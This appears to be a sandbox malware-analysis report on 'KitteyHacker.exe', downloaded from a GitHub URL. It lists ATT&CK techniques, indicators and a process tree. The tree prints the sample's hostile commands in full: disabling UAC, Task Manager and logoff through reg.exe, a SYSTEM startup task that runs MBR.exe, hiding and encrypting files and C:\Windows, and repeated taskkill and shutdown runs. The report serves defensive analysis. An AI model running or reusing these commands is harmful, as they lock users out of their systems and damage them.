hxxps://github[.]com/aadrians1/kitteyhacker/raw/main/KitteyHacker[.]exe

Resubmissions

29/08/2023, 12:27

230829-pmsdysfd8x 10

29/08/2023, 12:24

230829-ple28scd86 10

Analysis

max time kernel
75s
max time network
96s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
29/08/2023, 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/aadrians1/kitteyhacker/raw/main/KitteyHacker.exe

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1520	KitteyHacker.exe
2976	KitteyHacker.exe

Loads dropped DLL 3 IoCs

pid	Process
2976	KitteyHacker.exe
2976	KitteyHacker.exe
2976	KitteyHacker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
560	schtasks.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1744	taskkill.exe
2944	taskkill.exe
2556	taskkill.exe
2864	taskkill.exe
1380	taskkill.exe
792	taskkill.exe
1416	taskkill.exe
1912	taskkill.exe
3000	taskkill.exe
3028	taskkill.exe
2868	taskkill.exe
1144	taskkill.exe
2344	taskkill.exe
2844	taskkill.exe
2928	taskkill.exe
1208	taskkill.exe
2436	taskkill.exe
2664	taskkill.exe
936	taskkill.exe
1912	taskkill.exe
2744	taskkill.exe
2924	taskkill.exe
836	taskkill.exe
2916	taskkill.exe
2992	taskkill.exe
2392	taskkill.exe
2092	taskkill.exe
1644	taskkill.exe
1320	taskkill.exe
1152	taskkill.exe
2608	taskkill.exe
2708	taskkill.exe
1768	taskkill.exe
660	taskkill.exe
2152	taskkill.exe
2940	taskkill.exe
1764	taskkill.exe
2596	taskkill.exe
1508	taskkill.exe
2300	taskkill.exe
2256	taskkill.exe
2924	taskkill.exe
2340	taskkill.exe
1836	taskkill.exe
1976	taskkill.exe
1488	taskkill.exe
2044	taskkill.exe
1336	taskkill.exe
3032	taskkill.exe
836	taskkill.exe
560	taskkill.exe
1964	taskkill.exe
1204	taskkill.exe
1896	taskkill.exe
3048	taskkill.exe
1660	taskkill.exe
1416	taskkill.exe
1976	taskkill.exe
548	taskkill.exe
3048	taskkill.exe
2460	taskkill.exe
880	taskkill.exe
1940	taskkill.exe
2452	taskkill.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 20836fd773dad901	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 27 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003d000000900300001d020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{12752151-4667-11EE-8D08-D63E05CE97E8} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2976	KitteyHacker.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2976	KitteyHacker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeShutdownPrivilege	1960	shutdown.exe
Token: SeRemoteShutdownPrivilege	1960	shutdown.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeShutdownPrivilege	1796	shutdown.exe
Token: SeRemoteShutdownPrivilege	1796	shutdown.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	684	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeShutdownPrivilege	2144	shutdown.exe
Token: SeRemoteShutdownPrivilege	2144	shutdown.exe
Token: SeDebugPrivilege	2188	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	2844	taskkill.exe
Token: SeDebugPrivilege	1532	taskkill.exe
Token: SeShutdownPrivilege	2840	shutdown.exe
Token: SeRemoteShutdownPrivilege	2840	shutdown.exe
Token: SeDebugPrivilege	2744	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeShutdownPrivilege	2196	shutdown.exe
Token: SeRemoteShutdownPrivilege	2196	shutdown.exe
Token: SeDebugPrivilege	2640	taskkill.exe
Token: SeDebugPrivilege	320	taskkill.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeShutdownPrivilege	2592	shutdown.exe
Token: SeRemoteShutdownPrivilege	2592	shutdown.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	400	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeShutdownPrivilege	2308	shutdown.exe
Token: SeRemoteShutdownPrivilege	2308	shutdown.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	684	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeShutdownPrivilege	2040	shutdown.exe
Token: SeRemoteShutdownPrivilege	2040	shutdown.exe
Token: SeDebugPrivilege	2344	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	2916	taskkill.exe
Token: SeShutdownPrivilege	1640	shutdown.exe
Token: SeRemoteShutdownPrivilege	1640	shutdown.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	3048	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeShutdownPrivilege	2640	shutdown.exe
Token: SeRemoteShutdownPrivilege	2640	shutdown.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	748	Process not Found

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2896	iexplore.exe
2896	iexplore.exe
2244	efsui.exe
2244	efsui.exe
2244	efsui.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2244	efsui.exe
2244	efsui.exe
2244	efsui.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2896	iexplore.exe
2896	iexplore.exe
2932	IEXPLORE.EXE
2932	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 2932	2896	iexplore.exe	28
PID 2896 wrote to memory of 2932	2896	iexplore.exe	28
PID 2896 wrote to memory of 2932	2896	iexplore.exe	28
PID 2896 wrote to memory of 2932	2896	iexplore.exe	28
PID 2896 wrote to memory of 1520	2896	iexplore.exe	30
PID 2896 wrote to memory of 1520	2896	iexplore.exe	30
PID 2896 wrote to memory of 1520	2896	iexplore.exe	30
PID 2896 wrote to memory of 1520	2896	iexplore.exe	30
PID 1520 wrote to memory of 2272	1520	KitteyHacker.exe	31
PID 1520 wrote to memory of 2272	1520	KitteyHacker.exe	31
PID 1520 wrote to memory of 2272	1520	KitteyHacker.exe	31
PID 1520 wrote to memory of 2272	1520	KitteyHacker.exe	31
PID 2272 wrote to memory of 2324	2272	cmd.exe	33
PID 2272 wrote to memory of 2324	2272	cmd.exe	33
PID 2272 wrote to memory of 2324	2272	cmd.exe	33
PID 2272 wrote to memory of 616	2272	cmd.exe	34
PID 2272 wrote to memory of 616	2272	cmd.exe	34
PID 2272 wrote to memory of 616	2272	cmd.exe	34
PID 2272 wrote to memory of 1644	2272	cmd.exe	35
PID 2272 wrote to memory of 1644	2272	cmd.exe	35
PID 2272 wrote to memory of 1644	2272	cmd.exe	35
PID 2272 wrote to memory of 2620	2272	cmd.exe	37
PID 2272 wrote to memory of 2620	2272	cmd.exe	37
PID 2272 wrote to memory of 2620	2272	cmd.exe	37
PID 2272 wrote to memory of 2660	2272	cmd.exe	38
PID 2272 wrote to memory of 2660	2272	cmd.exe	38
PID 2272 wrote to memory of 2660	2272	cmd.exe	38
PID 2272 wrote to memory of 2192	2272	cmd.exe	39
PID 2272 wrote to memory of 2192	2272	cmd.exe	39
PID 2272 wrote to memory of 2192	2272	cmd.exe	39
PID 2272 wrote to memory of 2884	2272	cmd.exe	40
PID 2272 wrote to memory of 2884	2272	cmd.exe	40
PID 2272 wrote to memory of 2884	2272	cmd.exe	40
PID 2272 wrote to memory of 2988	2272	cmd.exe	41
PID 2272 wrote to memory of 2988	2272	cmd.exe	41
PID 2272 wrote to memory of 2988	2272	cmd.exe	41
PID 2272 wrote to memory of 1968	2272	cmd.exe	42
PID 2272 wrote to memory of 1968	2272	cmd.exe	42
PID 2272 wrote to memory of 1968	2272	cmd.exe	42
PID 2272 wrote to memory of 1196	2272	cmd.exe	43
PID 2272 wrote to memory of 1196	2272	cmd.exe	43
PID 2272 wrote to memory of 1196	2272	cmd.exe	43
PID 2272 wrote to memory of 2088	2272	cmd.exe	44
PID 2272 wrote to memory of 2088	2272	cmd.exe	44
PID 2272 wrote to memory of 2088	2272	cmd.exe	44
PID 2272 wrote to memory of 1680	2272	cmd.exe	45
PID 2272 wrote to memory of 1680	2272	cmd.exe	45
PID 2272 wrote to memory of 1680	2272	cmd.exe	45
PID 2272 wrote to memory of 1256	2272	cmd.exe	46
PID 2272 wrote to memory of 1256	2272	cmd.exe	46
PID 2272 wrote to memory of 1256	2272	cmd.exe	46
PID 2272 wrote to memory of 2052	2272	cmd.exe	47
PID 2272 wrote to memory of 2052	2272	cmd.exe	47
PID 2272 wrote to memory of 2052	2272	cmd.exe	47
PID 2272 wrote to memory of 2044	2272	cmd.exe	48
PID 2272 wrote to memory of 2044	2272	cmd.exe	48
PID 2272 wrote to memory of 2044	2272	cmd.exe	48
PID 2272 wrote to memory of 2532	2272	cmd.exe	49
PID 2272 wrote to memory of 2532	2272	cmd.exe	49
PID 2272 wrote to memory of 2532	2272	cmd.exe	49
PID 2272 wrote to memory of 1860	2272	cmd.exe	50
PID 2272 wrote to memory of 1860	2272	cmd.exe	50
PID 2272 wrote to memory of 1860	2272	cmd.exe	50
PID 2272 wrote to memory of 3032	2272	cmd.exe	51

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1076	attrib.exe
2532	attrib.exe
3032	attrib.exe
1136	attrib.exe
1852	attrib.exe
2596	attrib.exe
1504	attrib.exe
2324	attrib.exe
1860	attrib.exe
2064	attrib.exe
896	attrib.exe
1888	attrib.exe
2348	attrib.exe
660	attrib.exe
2416	attrib.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/aadrians1/kitteyhacker/raw/main/KitteyHacker.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2896 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2932
- C:\Users\Admin\Downloads\KitteyHacker.exe
  "C:\Users\Admin\Downloads\KitteyHacker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\B0AA.bat C:\Users\Admin\Downloads\KitteyHacker.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "C:\Users\Admin\AppData\Local\Temp\B0A9.tmp"
      4⤵
      Views/modifies file attributes
      PID:2324
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "C:\Users\Admin\AppData\Local\Temp\B0A9.tmp"
      4⤵
      PID:616
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "C:\Users\Admin\Downloads\KitteyHacker.exe"
      4⤵
      PID:1644
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E C:\Users\Admin\Downloads\KitteyHacker.exe
      4⤵
      PID:2620
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "KitteyHacker.exe"
      4⤵
      PID:2660
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "php5ts.dll"
      4⤵
      PID:2192
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "squall.dll"
      4⤵
      PID:2884
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "ext\php_squall.dll"
      4⤵
      PID:2988
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "ext"
      4⤵
      PID:1968
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "KitteyHacker.mp3"
      4⤵
      PID:1196
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "Kitty.mp3"
      4⤵
      PID:2088
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "Protogent.mp3"
      4⤵
      PID:1680
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "SM.exe"
      4⤵
      PID:1256
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "KHD.exe"
      4⤵
      PID:2052
  - - C:\Windows\System32\cipher.exe
      C:\Windows\System32\CIPHER /E "C:\Windows"
      4⤵
      PID:2044
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "C:\Users\Admin\Downloads\KitteyHacker.exe"
      4⤵
      Views/modifies file attributes
      PID:2532
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s C:\Users\Admin\Downloads\KitteyHacker.exe
      4⤵
      Views/modifies file attributes
      PID:1860
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "KitteyHacker.exe"
      4⤵
      Views/modifies file attributes
      PID:3032
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "php5ts.dll"
      4⤵
      Views/modifies file attributes
      PID:1888
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "squall.dll"
      4⤵
      Views/modifies file attributes
      PID:2348
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "ext\php_squall.dll"
      4⤵
      Views/modifies file attributes
      PID:660
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "ext"
      4⤵
      Views/modifies file attributes
      PID:2064
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "KitteyHacker.mp3"
      4⤵
      Views/modifies file attributes
      PID:1136
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "Kitty.mp3"
      4⤵
      Views/modifies file attributes
      PID:1852
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "Protogent.mp3"
      4⤵
      Views/modifies file attributes
      PID:896
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "MBR.exe"
      4⤵
      Views/modifies file attributes
      PID:2596
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "SM.exe"
      4⤵
      Views/modifies file attributes
      PID:2416
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "KHD.exe"
      4⤵
      Views/modifies file attributes
      PID:1504
  - - C:\Windows\System32\attrib.exe
      C:\Windows\System32\attrib +h +s "C:\Windows"
      4⤵
      Views/modifies file attributes
      PID:1076
  - - C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      4⤵
      PID:2340
  - - C:\Windows\System32\schtasks.exe
      C:\Windows\System32\SchTasks /Create /TN KitteyHacker /ru SYSTEM /SC ONSTART /TR ""C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\MBR.exe"" /RL HIGHEST /F
      4⤵
      Creates scheduled task(s)
      PID:560
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /F
      4⤵
      PID:1528
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /F
      4⤵
      PID:1380
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /F
      4⤵
      PID:1524
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /F
      4⤵
      PID:1972
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /F
      4⤵
      PID:300
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /t REG_DWORD /d 1 /F
      4⤵
      PID:1696
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /F
      4⤵
      UAC bypass
      PID:1264
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /F
      4⤵
      PID:1604
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /F
      4⤵
      PID:2320
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /F
      4⤵
      PID:2308
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /F
      4⤵
      PID:760
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /F
      4⤵
      PID:2600
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /F
      4⤵
      PID:932
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /F
      4⤵
      PID:2316
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /F
      4⤵
      PID:1652
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /F
      4⤵
      PID:2288
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /F
      4⤵
      PID:1460
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyGames /t REG_DWORD /d 1 /F
      4⤵
      PID:2432
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /F
      4⤵
      PID:1836
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /F
      4⤵
      PID:1912
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /F
      4⤵
      PID:2136
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /F
      4⤵
      PID:1856
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /F
      4⤵
      PID:740
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocs /t REG_DWORD /d 0 /F
      4⤵
      PID:596
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowDownloads /t REG_DWORD /d 0 /F
      4⤵
      PID:1096
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyGames /t REG_DWORD /d 0 /F
      4⤵
      PID:2384
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /F
      4⤵
      PID:2116
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /F
      4⤵
      PID:2420
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPics /t REG_DWORD /d 0 /F
      4⤵
      PID:1008
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecordedTV /t REG_DWORD /d 0 /F
      4⤵
      PID:2784
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowVideos /t REG_DWORD /d 0 /F
      4⤵
      PID:2112
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSetProgramAccessAndDefaults /t REG_DWORD /d 0 /F
      4⤵
      PID:2608
  - - C:\Windows\System32\reg.exe
      C:\Windows\System32\REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowPrinters /t REG_DWORD /d 0 /F
      4⤵
      PID:2016
  - - C:\Windows\System32\reg.exe
